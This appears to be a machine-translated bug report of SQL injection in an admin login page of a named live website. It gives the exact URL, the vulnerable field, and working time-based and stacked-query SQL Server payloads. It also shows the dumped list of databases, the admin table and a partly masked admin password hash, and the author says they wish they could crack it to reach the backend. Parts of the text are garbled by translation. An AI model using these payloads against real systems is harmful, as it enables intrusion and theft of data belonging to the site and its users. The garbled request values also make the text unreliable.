Xin Yi Network (Master of Flash machine) A system login site SQL injection a large number of databases
Http://fx.mgyun.com/main/admin/login.aspx (POST) button1 = & TextBox1 = rrNqPVs & TextBox2 = 1 & __ EVENTARGUMENT = & __ EVENTTARGET = & __ EVENTVALIDATION =/wEdAASHJB/7/tests/RuhzY1oLb/tests % 3d & __ LASTFOCUS = & __ VIEWSTATE =/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7 soAnkm/NxYDeJrd4mcNVYdeEDZxzSA % 3d % 3d Parameter textbox1 reference payload: rrNqPVs '; waitfor delay '0: 0: 5 '--
---
Parameter: TextBox1 (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button1 = & TextBox1 = rrNqPVs '; WAITFOR DELAY '0: 0: 5' -- & TextBox2 = 1 & __ EVENTARGUMENT = & __ EVENTTARGET = & __ EVENTVALIDATION =/wEdAASHJB/7/tests/RuhzY1oLb/tests + keys = & __ LASTFOCUS = & __ VIEWSTATE = /wEPDwUJ OTk2MDA3NzM2ZGSUmCpyWWbsdK/7 soAnkm/Tables = Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: button1 = & TextBox1 = rrNqPVs 'OR 9245 = (select count (*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) AND 'fgsi' = 'fgsi & TextBox2 = 1 & __ EVENTARGUMENT = & __ EVENTTA RGET = & __ EVENTVALIDATION =/wEdAASHJB/7/clusters/RuhzY1oLb/clusters + cores = & __ LASTFOCUS = & __ VIEWSTATE =/clusters/7 soAnkm/servers = --- web server operating system: windows 2008 R2 or 7web application technology: ASP. NET 4.0.30319, Microsoft IIS 7.5, ASP. NETback-end DBMS: Micros Oft SQL Server 2008 available databases [67]: [*] AnalyzeSystem [*] ApkGrabDB [*] AppCoolPoints ............. database: AnalyzeSystem [7 tables] + ------------ + | Admin | Functions | Group | Manager | MenuConfig | Model | ModelGroup | + ------------ + get the management password from here. Table: admin [1 entry] + --------- + region + ---------- + region + | AdminID | GroupID | DateLine | AdminPwd | AdminName | + --------- + ------------------ + ---------- + region + | 1 | 0 | 09 25 2012 | large ??? Tower | 3f85cffcdcf ***** a8a3b66cd47f7afed | + --------- + ---------------------- + ---------- + pipeline + It is a pity that it has not been cracked yet. Otherwise, I really want to go to the background! It is estimated that the amount of information is large enough!
Solution:
Filter